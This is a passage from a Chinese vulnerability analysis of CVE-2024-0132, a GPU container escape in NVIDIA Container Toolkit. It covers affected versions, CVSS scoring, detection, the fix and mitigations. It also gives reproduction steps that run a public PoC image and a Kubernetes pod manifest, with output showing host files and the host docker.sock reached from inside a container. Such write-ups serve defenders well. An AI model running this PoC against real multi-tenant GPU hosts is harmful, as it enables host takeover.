首个GPU容器逃逸: NVIDIA Container Toolkit CVE-2024-0132 漏洞分析

admin 2025年2月13日21:10:57评论15 views字数 105303阅读351分0秒阅读模式


一、基本信息

Item
Details
Note
Project
libnvidia-container


nvidia-container-toolkit

CVE-ID
CVE-2024-0132

Vuln's Author
Wiz Research: Shir Tamari, Ronen Shustin, Andres Riancho

CVSS
8.3 CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
NIST:NVD

9.0 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
CNA: NVIDIA Corporation

8.6 CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
ssst0n3
Exploits
github.com/ssst0n3/poc-cve-2024-0132

Affect Version
libnvidia-container >=v1.0.0, <=v1.16.1

Fix Version
1.16.2

Fix Commit
libnvidia-container PR#282

Introduce Commit
commit 35a9f27

Introduce Date
2018-09-14

Report Date
2024-09-01

Intelligence Gathering Date
2024-09-30

Publish Date
2024-09-26

二、组件简介

漏洞产生于 nvidia-container-cli 的库 libnvidia-container.so 中,他们都属于 libnvidia-container。 libnvidia-container和其他相关工具组成了 NVIDIA Container Toolkit。

NVIDIA Container Toolkit是由NVIDIA公司推出的一套工具,用于在容器化环境中实现GPU加速计算。它允许用户在Docker等容器平台中使用NVIDIA GPU,从而在容器中运行需要GPU支持的应用程序,如深度学习训练、推理、科学计算等。

  • libnvidia-container:提供了与容器运行时集成的底层库,负责管理GPU设备的挂载、驱动程序和CUDA库。
  • nvidia-container-runtime:这是一个容器运行时,扩展了标准的OCI(Open Container Initiative)运行时,使其支持GPU加速功能。
  • nvidia-docker2(已弃用):早期用于在Docker容器中使用NVIDIA GPU的插件,现在已被NVIDIA Container Toolkit取代。

三、漏洞作者

1. discoverer

1.1 Shir Tamari

首个GPU容器逃逸: NVIDIA Container Toolkit CVE-2024-0132 漏洞分析

Shir Tamari 是一位经验丰富的安全和技术研究员,专注于漏洞研究和实际黑客技术。他出身于 Israel Defense Forces, 目前,是云安全公司 Wiz 的研究主管。过去,他曾在研究、开发和产品领域为多家安全公司担任顾问。他挖掘了多个云安全领域知名漏洞,是 nvidia-container-toolkit 容器逃逸漏洞 CVE-2024-0132 的作者之一。

1.2 Ronen Shustin(ID: Ronen)

首个GPU容器逃逸: NVIDIA Container Toolkit CVE-2024-0132 漏洞分析

Ronen Shustin 是一位经验丰富的漏洞研究员,专注于云安全领域,曾在包括 Wiz、Check Point、以色列 8200 部队等知名组织任职。Ronen 在多个云平台上发现并报告了重要的安全漏洞,如 libnvidia-container CVE-2024-0132 容器逃逸漏洞、Azure PostgreSQL 数据库、GCP Cloud SQL 以及 IBM Cloud Databases for PostgreSQL 等。他在多个安全会议上发表了关于云安全和 Kubernetes 集群安全的演讲,并多次登上微软安全响应中心的安全研究员排行榜。

1.3 Andres Riancho(ID: andresriancho)

首个GPU容器逃逸: NVIDIA Container Toolkit CVE-2024-0132 漏洞分析

Andrés Riancho 是一位专注于攻击性应用安全和培训开发者编写安全代码的专家。他曾在Rapid7担任Web安全总监,领导团队改进了NeXpose的Web应用扫描器。他是开源Web应用安全扫描器w3af的创建者,该工具帮助用户识别和利用Web应用中的漏洞。他还为MercadoLibre和Despegar等拉美独角兽公司提供专业的安全咨询服务。安德烈斯热衷于在全球的安全和开发者大会上演讲,分享他在Web应用安全、漏洞利用和云安全等领域的丰富经验。他目前居住在阿根廷布宜诺斯艾利斯,并在全球范围内提供专业服务。

2. introducer: Jonathan Calmels(ID: 3XX0)

Role
Person
Contribution
Commits under runC
Author
Jonathan Calmels
Creator, #3 139 commits 34,933 ++ 7,690 --
commits

首个GPU容器逃逸: NVIDIA Container Toolkit CVE-2024-0132 漏洞分析

Jonathan Calmels 是 NVIDIA 的系统软件工程师。他的工作主要侧重于 GPU 数据中心软件和深度学习的超大规模解决方案。

3. fixer: Evan Lezar(ID: elezar)

Role
Person
Contribution
Commits under runC
Author
Jonathan Calmels
Contributor, #1 171 commits 3,516 ++ 2,553 --
commits
首个GPU容器逃逸: NVIDIA Container Toolkit CVE-2024-0132 漏洞分析

Evan Lezar 是一位经验丰富的软件工程师,具有商业和学术背景。他在多种编程语言、角色和团队配置方面拥有超过十年的工作经验。Evan 就职于 NVIDIA。他在计算电磁学领域尤其擅长使用 NVIDIA CUDA 进行 GPU 加速,已发表多篇相关论文,并参与多个国际会议。此外,Evan 还积极参与开源项目,贡献于多个与 NVIDIA GPU 管理、Kubernetes 和容器技术相关的项目。他的研究成果不仅推动了学术界的发展,也在工业界得到了广泛应用。

四、漏洞详情

1. 介绍

1.1 相关特性介绍:CUDA 前向兼容

libnvidia-container支持 CUDA前向兼容(CUDA Forward Compatibility),它允许容器在主机驱动程序版本较旧的情况下,使用比主机驱动程序更新的CUDA库,从而使容器化的CUDA应用程序能够运行在更新的CUDA版本上, 而无需更新主机上的NVIDIA驱动。这对需要使用新特性或新版本CUDA的容器化应用程序而言非常有用,同时保持了与主机系统的兼容性和稳定性。

具体来说,libnvidia-container 将会把容器/usr/local/cuda/compat目录下较新的CUDA库,挂载到容器 lib 目录。

1.2 漏洞介绍

NVIDIA Container Toolkit 的库 libnvidia-container 在处理CUDA 前向兼容特性时,会把容器/usr/local/cuda/compat目录下的文件挂载到容器 lib(/usr/lib/x86_64-linux-gnu/等) 目录,挂载行为受到软链接攻击影响,可导致任意主机目录被以只读模式挂载到容器内,进而可导致容器逃逸。

2. 影响

2.1 范围

libnvidia-container >= 1.0.0, <= 1.16.1

详细测量结果参见: https://github.com/ssst0n3/poc-cve-2024-0132/issues/2

nvidia-container-toolkit, gpu-operator 因为依赖libnvidia-container而受影响;

nvidia-container-toolkit 支持3种模式:

  • legacy: 默认配置,受影响。
  • cdi: 可以手动设置,不受影响。
  • csv: 可以手动设置,不受影响。(此模式主要针对没有 NVML 可用的基于 Tegra 的系统, 官方未提供详细的使用教程,预计使用该模式的用户极少;使用csv模式需要用户手动设置要挂载的文件、设备,不涉及相关特性。)

2.2 危害

可导致任意主机目录被以只读模式挂载到容器内,通过 docker.sock 等文件可调用容器API实现容器逃逸。

2.2.1 CVSS3.1 8.6 (by ssst0n3)

8.6 CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

vector
score
reason
Attack Vector
Local
需要运行容器镜像默认为Local,对于提供部署容器的云服务则提升至Network
Attack Complexity
Low
100%利用成功,实际不需要条件竞争, NIST:NVD被NVIDIA漏洞公告误导,给出了H
Privileges Required
None
运行容器是使用产品的条件,无需额外权限
User Interaction
Required
需要运行特定镜像
Scope
Changed
容器逃逸,授权体系改变
Confidentiality
High

Integrity
High

Availability
High

2.2.2 CVSS3.1 9.0 (by NVIDIA)

9.0 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

vector
score
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
None/Low/High
2.2.3 CVSS3.1 8.3 (by NIST:NVD)

8.3 CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

vector
score
Attack Vector
Network
Attack Complexity
High
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

2.3 利用场景

影响允许用户运行任意镜像并在容器内使用NVIDIA GPU的服务。

五、防御

1. 漏洞存在性检测

可通过以下命令确认是否使用受影响版本。

(1) 查看 /etc/docker/daemon.json 或 /etc/containerd/config.toml 文件中是否包含 nvidia 字段。

以下示例说明,有使用NVIDIA Container Toolkit

root@localhost:~# cat /etc/docker/daemon.json  |grep nvidia
        "nvidia": {
            "path""nvidia-container-runtime"
root@localhost:~# cat /etc/containerd/config.toml  |grep nvidia
        "/usr/bin/nvidia-container-runtime"

(2) 执行相关命令 nvidia-container-runtime --version 等。

以下示例说明,使用的版本为 1.16.2, 不受此漏洞影响。

root@localhost:~# nvidia-container-runtime --version
NVIDIA Container Runtime version 1.16.2
commit: a5a5833c14a15fd9c86bcece85d5ec6621b65652
spec: 1.2.0

runc version 1.1.12-0ubuntu2~22.04.1
spec: 1.0.2-dev
go: go1.21.1
libseccomp: 2.5.3

2. 修复建议

英伟达已发布修复版本,升级至 v1.16.2 及以上版本可以修复。

可参考官方安装指导:https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/install-guide.html

3. 规避措施

  1. 避免执行不可信的镜像
  2. 或使用CDI方式使用gpu, 详见官方文档: (https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/cdi-support.html)

4. 漏洞利用检测

(1) 漏洞利用时会执行 mount 系统调用,可以通过该系统调用的参数检测。 (2) 也可以检测容器进程对主机文件的访问。

六、漏洞复现

1. nvidia-container-toolkit

  • 复现环境: 华为云香港ECS(ubuntu 22.04, nvidia driver) + docker v27.1.0 + nvidia-container-toolkit v1.16.1
  • 复现步骤:
    • 运行PoC镜像
  • 目标现象: 显示在容器内访问了主机文件,可通过docker.sock调用docker API

更多版本的影响情况测量,详见 https://github.com/ssst0n3/poc-cve-2024-0132/issues/2

1.1 复现环境

购买华为云香港节点弹性云服务器,我购买的具体配置如下

  • 计费模式:按需计费
  • 区域/可用区:中国-香港 | 随机分配
  • 实例规格:GPU加速型 | pi2.2xlarge.4 | 8vCPUs | 32GiB | GPU显卡: 1 * NVIDIA Tesla T4 / 1 * 16GiB
  • 操作系统镜像:Ubuntu 22.04 server 64bit with Tesla Driver 470.223.02 and CUDA 11.4
$ ssh wanglei-gpu3
root@wanglei-gpu3:~# nvidia-smi 
Tue Oct 15 11:13:33 2024       
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.223.02   Driver Version: 470.223.02   CUDA Version: 11.4     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla T4            On   | 00000000:00:0D.0 Off |                    0 |
| N/A   30C    P8     9W /  70W |      0MiB / 15109MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
                                                                               
+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

下面开始安装docker和nvidia-container-toolkit

root@wanglei-gpu3:~# apt update && apt install docker.io -y
root@wanglei-gpu3:~# curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg
    && curl -s -L https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list |
    sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' |
    tee /etc/apt/sources.list.d/nvidia-container-toolkit.list
root@wanglei-gpu3:~# apt-get update &&
    apt-get install -y libnvidia-container1=1.16.1-1
    libnvidia-container-tools=1.16.1-1
    nvidia-container-toolkit-base=1.16.1-1
    nvidia-container-toolkit=1.16.1-1

配置容器运行时 nvidia

root@wanglei-gpu3:~# nvidia-ctk runtime configure --runtime=docker
WARN[0000] Ignoring runtime-config-override flag for docker 
INFO[0000] Config file does not exist; using empty config 
INFO[0000] Wrote updated config to /etc/docker/daemon.json 
INFO[0000] It is recommended that docker daemon be restarted.
root@wanglei-gpu3:~# systemctl restart docker

环境信息如下

root@wanglei-gpu3:~# nvidia-container-cli --version
cli-version: 1.16.1
lib-version: 1.16.1
build date: 2024-07-23T14:57+00:00
build revision: 4c2494f16573b585788a42e9c7bee76ecd48c73d
build compiler: x86_64-linux-gnu-gcc-7 7.5.0
build platform: x86_64
build flags: -D_GNU_SOURCE -D_FORTIFY_SOURCE=2 -DNDEBUG -std=gnu11 -O2 -g -fdata-sections -ffunction-sections -fplan9-extensions -fstack-protector -fno-strict-aliasing -fvisibility=hidden -Wall -Wextra -Wcast-align -Wpointer-arith -Wmissing-prototypes -Wnonnull -Wwrite-strings -Wlogical-op -Wformat=2 -Wmissing-format-attribute -Winit-self -Wshadow -Wstrict-prototypes -Wunreachable-code -Wconversion -Wsign-conversion -Wno-unknown-warning-option -Wno-format-extra-args -Wno-gnu-alignof-expression -Wl,-zrelro -Wl,-znow -Wl,-zdefs -Wl,--gc-sections
root@wanglei-gpu3:~
root@wanglei-gpu3:~# nvidia-container-cli info
NVRM version:   470.223.02
CUDA version:   11.4

Device Index:   0
Device Minor:   0
Model:          Tesla T4
Brand:          Nvidia
GPU UUID:       GPU-03ef96a1-75d6-9917-ed12-4db7f79bfa4b
Bus Location:   00000000:00:0d.0
Architecture:   7.5
root@wanglei-gpu3:~
root@wanglei-gpu3:~# docker info
Client:
 Version:    24.0.7
 Context:    default
 Debug Mode: false

Server:
 Containers: 0
  Running: 0
  Paused: 0
  Stopped: 0
 Images: 0
 Server Version: 24.0.7
 Storage Driver: overlay2
  Backing Filesystem: extfs
  Supports d_type: true
  Using metacopy: false
  Native Overlay Diff: true
  userxattr: false
 Logging Driver: json-file
 Cgroup Driver: systemd
 Cgroup Version: 2
 Plugins:
  Volume: local
  Network: bridge host ipvlan macvlan null overlay
  Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
 Swarm: inactive
 Runtimes: io.containerd.runc.v2 nvidia runc
 Default Runtime: runc
 Init Binary: docker-init
 containerd version: 
 runc version: 
 init version: 
 Security Options:
  apparmor
  seccomp
   Profile: builtin
  cgroupns
 Kernel Version: 5.15.0-76-generic
 Operating System: Ubuntu 22.04.2 LTS
 OSType: linux
 Architecture: x86_64
 CPUs: 8
 Total Memory: 31.15GiB
 Name: wanglei-gpu3
 ID: bc9d2464-60ee-458d-93a0-fab77847a4b3
 Docker Root Dir: /var/lib/docker
 Debug Mode: false
 Experimental: false
 Insecure Registries:
  127.0.0.0/8
 Live Restore Enabled: false

1.2 漏洞复现

使用预先构建的poc镜像 ssst0n3/poc-cve-2024-0132 , 或临时构建。

root@wanglei-gpu3:~# git clone https://github.com/ssst0n3/poc-cve-2024-0132.git
root@wanglei-gpu3:~# cd poc-cve-2024-0132
root@wanglei-gpu3:~/poc-cve-2024-0132# docker build -t ssst0n3/poc-cve-2024-0132 .
...
root@wanglei-gpu3:~/poc-cve-2024-0132# docker run -ti --runtime=nvidia --gpus=all ssst0n3/poc-cve-2024-0132
+ cat /host/etc/hostname
wanglei-gpu3
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
[{"Id":"6dac93a4b9aaa6e2db5bed64f550d111e6e9604375e3210b46b59b095635290f","Names":["/nifty_booth"],"Image":"ssst0n3/poc-cve-2024-0132","ImageID":"sha256:53f3d5c92e144343851ec800aa7a0af201517262498519cc4dfd53688da9b112","Command":"/bin/sh -c /entrypoint.sh","Created":1728996664,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"72649d2ea91c5c657b26de4af617b491e8f09bf9c2e5e8a44695ff10e68191b6","EndpointID":"be81eb91bfafd69bb442f3ccf9790ff5da9ae9ef42ad643aa4a686c3040f404b","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[]}]

2. gpu-operator

  • 复现环境: 华为云香港CCE Standard(k8s v1.30) + docker v24.0.9 + gpu-operator v24.6.1
  • 复现步骤:
    • 运行PoC镜像
  • 目标现象: 显示在容器内访问了主机文件,可通过docker.sock调用docker API

测试gpu-operator的目的是证明,其受影响情况原因是其安装的 nvidia-container-toolkit, 故而未测量其他版本。

2.1 复现环境

购买华为云香港节点CCE集群,我购买的具体配置如下

  • 计费模式:按需计费
  • 集群版本:v1.30
  • 添加节点:
    • 计费模式:按需计费
    • 区域/可用区:中国-香港 | 随机分配
    • 实例规格:GPU加速型 | pi2.2xlarge.4 | 8vCPUs | 32GiB | GPU显卡: 1 * NVIDIA Tesla T4 / 1 * 16GiB
    • 镜像:Ubuntu 22.04
root@wanglei-k8s-gpu-02862:~# lspci |grep NVIDIA
00:0d.0 3D controller: NVIDIA Corporation TU104GL [Tesla T4] (rev a1)

下面开始安装 gpu-operator

$ scp wanglei-k8s-gpu-kubeconfig.yaml wanglei-k8s-gpu-02862:
$ ssh wanglei-k8s-gpu-02862
root@wanglei-k8s-gpu-02862:~# curl -fsSL -o get_helm.sh https://raw.githubusercontent.com/helm/helm/master/scripts/get-helm-3 && chmod 700 get_helm.sh && ./get_helm.sh
Downloading https://get.helm.sh/helm-v3.16.3-linux-amd64.tar.gz
Verifying checksum... Done.
Preparing to install helm into /usr/local/bin
helm installed into /usr/local/bin/helm
root@wanglei-k8s-gpu-02862:~# helm repo add nvidia https://helm.ngc.nvidia.com/nvidia && helm repo update
WARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/config
WARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/config
"nvidia" has been added to your repositories
WARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/config
WARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/config
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "nvidia" chart repository
Update Complete. ⎈Happy Helming!⎈
root@wanglei-k8s-gpu-02862:~# helm install --wait --generate-name -n gpu-operator --create-namespace nvidia/gpu-operator --version=v24.6.1
WARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/config
WARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/config
NAME: gpu-operator-1733143549
LAST DEPLOYED: Mon Dec  2 20:45:52 2024
NAMESPACE: gpu-operator
STATUS: deployed
REVISION: 1
TEST SUITE: None

遇到 Init:CrashLoopBackOff 错误,不清楚原因。删除pod等待重建即可。

root@wanglei-k8s-gpu-02862:~# kubectl get pods -n gpu-operator
NAME                                                              READY   STATUS                  RESTARTS      AGE
gpu-feature-discovery-nmz44                                       0/1     Init:0/1                0             4m42s
gpu-operator-1733143549-node-feature-discovery-gc-c9474d8bfvxfv   1/1     Running                 0             6m3s
gpu-operator-1733143549-node-feature-discovery-master-86985w2n8   1/1     Running                 0             6m3s
gpu-operator-1733143549-node-feature-discovery-worker-5c7cp       1/1     Running                 0             6m3s
gpu-operator-77fdfcd757-4gxq4                                     1/1     Running                 0             6m3s
nvidia-container-toolkit-daemonset-xnfjx                          1/1     Running                 0             4m42s
nvidia-dcgm-exporter-9d8bp                                        0/1     Init:0/1                0             4m42s
nvidia-device-plugin-daemonset-dz84j                              0/1     Init:0/1                0             4m42s
nvidia-driver-daemonset-w2xmw                                     1/1     Running                 0             5m33s
nvidia-operator-validator-kjc2x                                   0/1     Init:CrashLoopBackOff   3 (23s ago)   4m42s
root@wanglei-k8s-gpu-02862:~# kubectl delete pod -n gpu-operator nvidia-operator-validator-kjc2x
root@wanglei-k8s-gpu-02862:~# kubectl get pods -n gpu-operator
NAME                                                              READY   STATUS      RESTARTS   AGE
gpu-feature-discovery-nmz44                                       1/1     Running     0          8m7s
gpu-operator-1733143549-node-feature-discovery-gc-c9474d8bfvxfv   1/1     Running     0          9m28s
gpu-operator-1733143549-node-feature-discovery-master-86985w2n8   1/1     Running     0          9m28s
gpu-operator-1733143549-node-feature-discovery-worker-5c7cp       1/1     Running     0          9m28s
gpu-operator-77fdfcd757-4gxq4                                     1/1     Running     0          9m28s
nvidia-container-toolkit-daemonset-xnfjx                          1/1     Running     0          8m7s
nvidia-cuda-validator-895qp                                       0/1     Completed   0          2m15s
nvidia-dcgm-exporter-9d8bp                                        1/1     Running     0          8m7s
nvidia-device-plugin-daemonset-2s7z2                              1/1     Running     0          22s
nvidia-driver-daemonset-w2xmw                                     1/1     Running     0          8m58s
nvidia-operator-validator-gd74c                                   1/1     Running     0          2m17s

环境信息如下

root@wanglei-k8s-gpu-02862:~# kubectl exec -n gpu-operator nvidia-driver-daemonset-w2xmw nvidia-smi
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
Mon Dec  2 12:57:22 2024       
+-----------------------------------------------------------------------------------------+
| NVIDIA-SMI 550.90.07              Driver Version: 550.90.07      CUDA Version: 12.4     |
|-----------------------------------------+------------------------+----------------------+
| GPU  Name                 Persistence-M | Bus-Id          Disp.A | Volatile Uncorr. ECC |
| Fan  Temp   Perf          Pwr:Usage/Cap |           Memory-Usage | GPU-Util  Compute M. |
|                                         |                        |               MIG M. |
|=========================================+========================+======================|
|   0  Tesla T4                       On  |   00000000:00:0D.0 Off |                    0 |
| N/A   28C    P8              9W /   70W |       1MiB /  15360MiB |      0%      Default |
|                                         |                        |                  N/A |
+-----------------------------------------+------------------------+----------------------+
                                                                                         
+-----------------------------------------------------------------------------------------+
| Processes:                                                                              |
|  GPU   GI   CI        PID   Type   Process name                              GPU Memory |
|        ID   ID                                                               Usage      |
|=========================================================================================|
|  No running processes found                                                             |
+-----------------------------------------------------------------------------------------+

2.2 漏洞复现

root@wanglei-k8s-gpu-02862:~# cat poc-cve-2024-0132.yaml 
apiVersion: v1
kind: Pod
metadata:
  name: poc-cve-2024-0132
spec:
  restartPolicy: OnFailure
  containers:
  - name: poc-cve-2024-0132
    image: "docker.io/ssst0n3/poc-cve-2024-0132:latest"
    imagePullPolicy: IfNotPresent
    resources:
      limits:
        nvidia.com/gpu: 1
root@wanglei-k8s-gpu-02862:~# kubectl apply -f poc-cve-2024-0132.yaml 
pod/poc-cve-2024-0132 created
root@wanglei-k8s-gpu-02862:~# kubectl logs poc-cve-2024-0132
+ cat /host/etc/hostname
wanglei-k8s-gpu-02862
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 77281    0 77281    0     0  12.6M      0 --:--:-- --:--:-- --:--:-- 14.7M
[{"Id":"5106c279c3a900712370fccaf6d0ee5e8cb40673ca5886a75a9265f7853e5f05","Names":["/k8s_poc-cve-2024-0132_poc-cve-2024-0132_default_09203b3a-10e4-490a-8f86-abdc1b36c8ae_0"],"Image":"sha256:5fa3c2349168a5c8b3927907399ba19e500d8d86e5c84315
...

3. nvidia-container-toolkit(CDI模式): 不受影响

  • 复现环境: 华为云香港ECS(ubuntu 22.04, nvidia driver) + docker v27.1.0 + nvidia-container-toolkit v1.16.1
  • 复现步骤:
    • 运行PoC镜像
  • 目标现象: 显示在容器内访问了主机文件,可通过docker.sock调用docker API

3.1 复现环境

环境同 1.1 节。

按照1.1节:

  • 安装docker和nvidia-container-toolkit
  • 配置容器运行时
$ apt update && apt install docker.io -y
$ curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg
    && curl -s -L https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list |
    sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' |
    tee /etc/apt/sources.list.d/nvidia-container-toolkit.list
$ apt-get update &&
    apt-get install -y libnvidia-container1=1.16.1-1
    libnvidia-container-tools=1.16.1-1
    nvidia-container-toolkit-base=1.16.1-1
    nvidia-container-toolkit=1.16.1-1
$ nvidia-ctk runtime configure --runtime=docker
$ systemctl restart docker

安装完毕后设置CDI模式

$ nvidia-ctk cdi generate --output=/etc/cdi/nvidia.yaml

3.2 漏洞复现: 无法利用

root@wanglei-gpu:~# docker run --rm -ti --runtime=nvidia -e NVIDIA_VISIBLE_DEVICES=nvidia.com/gpu=all ssst0n3/poc-cve-2024-0132:latest
+ cat /host/etc/hostname
cat: /host/etc/hostname: Not a directory
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
curl: (7) Failed to connect to localhost port 80 after 0 ms: Couldn't connect to server

七、漏洞分析

1. 原始特性分析

1.1 在容器中使用 nvidia gpu

可参考官方文档安装、使用nvidia gpu容器。nvidia-container-toolkit 借助 runc hook 在容器启动前,挂载相关必要驱动。

  • https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/install-guide.html
  • https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/sample-workload.html
$ docker run --rm --runtime=nvidia --gpus all ubuntu nvidia-smi
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.223.02   Driver Version: 470.223.02   CUDA Version: 11.4     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla T4            On   | 00000000:00:0D.0 Off |                    0 |
| N/A   29C    P8     9W /  70W |      0MiB / 15109MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
                                                                               
+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

1.2 nvidia-container-toolkit cuda 前向兼容特性

  • 向前兼容性(Forward Compatibility):在计算机科学和软件工程中,向前兼容性是指一个系统、产品或标准能够与未来的版本协同工作的能力。也就是说,现有的软件或硬件能够在未来更新后,仍然保持功能或兼容性。
    • 示例:一个使用旧版本编译的程序,能够在新版本的环境中运行。
  • 向后兼容性(Backward Compatibility):是指新版本的系统、产品或标准能够与旧版本的组件协同工作的能力。
    • 示例:一个新版本的软件能够读取旧版本的数据文件。

在 NVIDIA 的官方文档 "CUDA Compatibility Guide"(https://docs.nvidia.com/deploy/cuda-compatibility/index.html) 中,明确提到了 CUDA 的向前兼容性,强调应用程序能够在未来版本的 CUDA 驱动程序和硬件上运行。

"Forward Compatibility: Applications compiled on an earlier CUDA toolkit version can run on newer CUDA drivers and, in some cases, newer GPUs."

NVIDIA 在其文档中还提到,CUDA Runtime 提供了向前兼容性,允许应用程序在使用较新版本驱动程序的系统上运行。

"The CUDA runtime built into the CUDA driver guarantees binary compatibility and backward compatibility. Applications compiled against a particular version of the CUDA runtime can therefore run without recompilation on newer CUDA-capable GPUs and on systems with newer drivers."

具体来说,libnvidia-container 将会把容器/usr/local/cuda/compat目录下较新的CUDA库,挂载到容器 lib 目录。

$ docker run --rm --runtime=nvidia --gpus all nvidia/cuda:12.6.2-cudnn-runtime-ubuntu24.04 cat /proc/self/mountinfo |grep compat
677 652 0:48 /usr/local/cuda-12.6/compat/libcuda.so.560.35.03 /usr/lib/x86_64-linux-gnu/libcuda.so.560.35.03 ro,nosuid,nodev,relatime master:265 - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/7PESVCWGEYV5EAUFQQOU54JC5I:/var/lib/docker/overlay2/l/PIMQYFKPYMVGLM7JIYDNWWQNMV:/var/lib/docker/overlay2/l/BOOUOLOLY4GM525O7PGZYXHWAR:/var/lib/docker/overlay2/l/JFDVXPNFZHK6MO35W275FXWJK2:/var/lib/docker/overlay2/l/DHPPA554ZRQ3RMXBAC4TCQ2ONI:/var/lib/docker/overlay2/l/7VXIOP6JUX5AQWZDCES4OSMUE3:/var/lib/docker/overlay2/l/VXIMXECSGJPSZSTCV4L3F5SSVF:/var/lib/docker/overlay2/l/GNHB2U3KK74XBRHDNTTRBPLO5V:/var/lib/docker/overlay2/l/CPLKLXQBHMU2HSD2KH7QST3XPC:/var/lib/docker/overlay2/l/5I4CMPNMDVNB4OH6B3LTCLKUX5:/var/lib/docker/overlay2/l/MZVFHZWHWZ6WESPEACUAGYRIW2,upperdir=/var/lib/docker/overlay2/a2f1240f551528f47be90b6b6c7e923470009998687bb7d77ab112c19e325f6e/diff,workdir=/var/lib/docker/overlay2/a2f1240f551528f47be90b6b6c7e923470009998687bb7d77ab112c19e325f6e/work
...
$ docker run --rm --runtime=nvidia --gpus all nvidia/cuda:12.6.2-cudnn-runtime-ubuntu24.04 nvidia-smi

==========
== CUDA ==
==========

CUDA Version 12.6.2

Container image Copyright (c) 2016-2023, NVIDIA CORPORATION & AFFILIATES. All rights reserved.

This container image and its contents are governed by the NVIDIA Deep Learning Container License.
By pulling and using the container, you accept the terms and conditions of this license:
https://developer.nvidia.com/ngc/nvidia-deep-learning-container-license

A copy of this license is made available in this container at /NGC-DL-CONTAINER-LICENSE for your convenience.

Tue Nov 26 12:40:00 2024       
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.223.02   Driver Version: 470.223.02   CUDA Version: 12.6     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla T4            On   | 00000000:00:0D.0 Off |                    0 |
| N/A   29C    P8     9W /  70W |      0MiB / 15109MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
                                                                               
+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

1.3 CDI

